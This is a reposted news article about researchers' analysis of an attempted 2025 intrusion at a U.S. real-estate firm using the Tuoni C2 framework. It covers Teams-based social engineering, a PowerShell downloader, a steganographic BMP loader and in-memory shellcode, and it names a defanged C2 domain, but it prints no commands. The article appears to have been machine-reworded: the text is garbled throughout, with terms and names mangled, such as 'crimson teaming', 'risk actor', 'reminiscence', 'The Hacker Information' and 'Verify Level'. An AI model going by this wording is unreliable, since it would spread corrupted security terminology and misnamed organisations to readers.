Researchers Detail Tuoni C2’s Role in an Attempted 2025 Real-Estate Cyber Intrusion

Researchers Detail Tuoni C2’s Role in an Attempted 2025 Real-Estate Cyber Intrusion

Posted on By CWS

Nov 18, 2025Ravie LakshmananMalware / Social Engineering
Cybersecurity researchers have disclosed particulars of a cyber assault concentrating on a serious U.S.-based real-estate firm that concerned using a nascent command-and-control (C2) and crimson teaming framework often called Tuoni.
“The marketing campaign leveraged the rising Tuoni C2 framework, a comparatively new, command-and-control (C2) instrument (with a free license) that delivers stealthy, in-memory payloads,” Morphisec researcher Shmuel Uzan mentioned in a report shared with The Hacker Information.
Tuoni is marketed as a sophisticated C2 framework designed for safety professionals, facilitating penetration testing operations, crimson group engagements, and safety assessments. A “Neighborhood Version” of the software program is freely accessible for obtain from GitHub. It was first launched in early 2024.

The assault, per Morphisec, unfolded in mid-October 2025, with the unknown risk actor doubtless leveraging social engineering by way of Microsoft Groups impersonation for preliminary entry. It is suspected that the attackers doubtless posed as trusted distributors or colleagues to deceive an worker on the firm into working a PowerShell command.
The command, for its half, downloads a second PowerShell script from an exterior server (“kupaoquan[.]com”), which, in flip, employs steganographic methods to hide the next-stage payload inside a bitmap picture (BMP). The first purpose of the embedded payload is to extract shellcode and execute it immediately in reminiscence.
This leads to the execution of “TuoniAgent.dll,” which corresponds to an agent that operates inside the focused machine and connects to a C2 server (on this case, “kupaoquan[.]com”), permitting for distant management.
“Whereas Tuoni itself is a classy however conventional C2 framework, the supply mechanism confirmed indicators of AI help in code era, evident from the scripted feedback and modular construction of the preliminary loader,” Morphisec added.
The assault, though in the end unsuccessful, demonstrates continued abuse of crimson teaming instruments for malicious functions. In September 2025, Verify Level detailed using a synthetic intelligence (AI)-powered instrument known as HexStrike AI to quickly speed up and simplify vulnerability exploitation.

The Hacker News Tags:, , , , , , , ,

Related Posts

OpenAI Bans ChatGPT Accounts Used by Russian, Iranian and Chinese Hacker Groups OpenAI Bans ChatGPT Accounts Used by Russian, Iranian and Chinese Hacker Groups The Hacker News
CISA Directs Agencies to Remove Outdated Edge Devices CISA Directs Agencies to Remove Outdated Edge Devices The Hacker News
Two New Supermicro BMC Bugs Allow Malicious Firmware to Evade Root of Trust Security Two New Supermicro BMC Bugs Allow Malicious Firmware to Evade Root of Trust Security The Hacker News
SonicWall Fixes Actively Exploited CVE-2025-40602 in SMA 100 Appliances SonicWall Fixes Actively Exploited CVE-2025-40602 in SMA 100 Appliances The Hacker News
Automated FortiGate Attacks Exploit FortiCloud SSO to Alter Firewall Configurations Automated FortiGate Attacks Exploit FortiCloud SSO to Alter Firewall Configurations The Hacker News
How to Use Ringfencing to Prevent the Weaponization of Trusted Software How to Use Ringfencing to Prevent the Weaponization of Trusted Software The Hacker News